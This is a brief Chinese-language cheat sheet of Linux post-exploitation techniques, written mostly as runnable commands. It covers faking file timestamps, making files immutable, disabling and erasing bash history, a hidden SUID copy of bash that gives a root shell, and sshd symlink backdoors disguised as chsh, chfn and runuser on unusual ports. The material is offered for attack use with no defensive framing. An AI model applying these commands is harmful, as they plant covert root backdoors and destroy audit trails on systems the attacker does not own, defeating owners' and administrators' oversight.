文章目录

• • • • 文件及操作记录隐藏
      • SUID
      • 建立sshd的软连接用于登录

文件及操作记录隐藏

1、文件建立日期更改：touch -r 已存在文件 新增文件
使用效果：新增文件日期更改为与已存在文件创建日期一致

2、文件锁定
添加锁定：chattr +i 文件
解除锁定：chattr -i 文件
查看文件状态：lsattr

3、隐藏历史命令
set +o history #不记录命令
history -d 命令序号 #删除为该序号的记录
set -o history #重新开始记录命令
sed -i ‘1,200d’ .bash_history #删除序号为1至200的命令记录

SUID

当⼀个⽂件所属主的x标志位s(set uid简称suid)时，且所属主为root时，当执⾏该⽂件时，其实是以root身份执⾏的。
1、SUID权限仅对⼆进制程序有效。
2、执⾏者对于该程序需要具有x的可执⾏权限
3、本权限仅在执⾏该程序的过程中有效
4、在执⾏过程中执⾏者将具有该程序拥有者的权限
使用root权限创建一个属主为root的suid文件：
$cp /bin/bash /tmp/.mybash
$chmod 4755 /tmp/.mybash
使用普通用户运行
/tmp/.mybash -p
获得root权限shell

建立sshd的软连接用于登录

ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oPort=23333
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=23334
ln -sf /usr/sbin/sshd /tmp/runuser;/tmp/runuser -oPort=23335